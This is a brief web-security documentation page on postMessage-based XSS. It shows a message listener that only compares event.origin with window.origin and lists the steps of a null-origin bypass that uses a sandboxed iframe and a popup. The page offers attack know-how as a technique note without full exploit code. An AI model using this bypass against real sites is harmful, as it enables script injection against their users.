Skip to Content
DocumentationpostMessage based XSS

postMessage based XSS

Null Origin Bypass

If the only check is like the following:

window.addEventListener('message', function(event) {
  if (event.origin !== window.origin) {
    return;
  }
  // Process message
});

Then, you could bypass this check by

  • Start your own HTTP server
  • On the home page, add an iframe with sandbox attribute sandbox="allow-scripts allow-popups"
  • From the iframe, open a new window
  • The origin of iframe and the new window popup will be null, so the above check will pass

Expand to see code for xssPostmessageNullOrigin...

Ref: CTBB 

Last updated on
CSPwindow.open()